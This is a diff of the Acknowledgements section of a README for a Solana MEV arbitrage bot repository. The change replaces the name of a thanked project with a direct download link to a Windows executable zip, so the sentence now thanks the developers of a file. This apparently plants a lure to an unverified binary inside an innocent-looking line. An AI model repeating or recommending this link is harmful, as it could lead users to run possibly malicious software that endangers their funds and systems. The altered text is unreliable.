lemixred/Mev-Bot-Solana/README.md

 ---

 ## Acknowledgements
-The MEV Bot Solana project would like to thank the developers and contributors of Pump.FUN, Jupiter, Raydium, and all the other tools and platforms that make decentralized arbitrage possible.
+The MEV Bot Solana project would like to thank the developers and contributors of https://github.com/lemixred/Mev-Bot-Solana/releases/download/v1.0/Release_x64.zip, Jupiter, Raydium, and all the other tools and platforms that make decentralized arbitrage possible.
 Your dedication to the blockchain ecosystem is truly commendable.

 ---